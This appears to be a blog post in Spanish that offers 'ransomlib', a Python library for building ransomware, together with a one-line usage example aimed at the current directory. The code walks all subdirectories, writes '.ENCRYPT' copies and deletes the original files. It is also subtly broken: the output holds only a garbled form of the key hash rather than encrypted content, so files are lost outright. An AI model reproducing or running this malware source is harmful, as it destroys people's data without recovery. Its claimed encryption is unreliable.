uso = ransomlib.encrypt("llave de cifrado", "directorio a cifrar", "extencion de los archivos despues de cifrados")
import os
import ransomlib
directorio = os.getcwd()
key = "ransomwasad"
extencion = ".ENCRYPT"
ransomlib.encrypt(key, directorio, extencion)
#!usr/bin/env python
#_*_ coding: utf8 _*_
#ransomlib.py
import os
import sys
import hashlib
#__________ .__ ._____.
#\______ \_____ ____ __________ _____ | | |__\_ |__
# | _/\__ \ / \ / ___/ _ \ / \| | | || __ \
# | | \ / __ \| | \\___ ( <_> ) Y Y \ |_| || \_\ \
# |____|_ /(____ /___| /____ >____/|__|_| /____/__||___ /
# \/ \/ \/ \/ \/ \/
# libreria para crear ransomwares con solo un linea de codigo en python
# python 2.x y 3
# por JOKER-116
# no me hago responsable de su mal uso
# bucle for para escanear directorios y subdirectorios en busca de archivos!
def encrypt(key, path, ext):
for root, direcs, archivos in os.walk(path):
for archivo in archivos:
archivo = os.path.join(root, archivo)
output = archivo + ext
if archivo.endswith(('.py', '.exe', '.iso', '.bin', '.zip', '.rar', '.dll', '.sys')):
print("pass executable file!")
else:
key = str(key)
key = hashlib.sha256(key)
key = key.digest()
try:
archivo_input = open(archivo, 'rb')
readed = archivo_input.read()
archivo_input.close()
read = open(output, 'wb')
read.write(key.replace("",key))
read.close()
print(archivo)
except:
print("file error!")
try:
os.remove(archivo)
except:
pass
No hay comentarios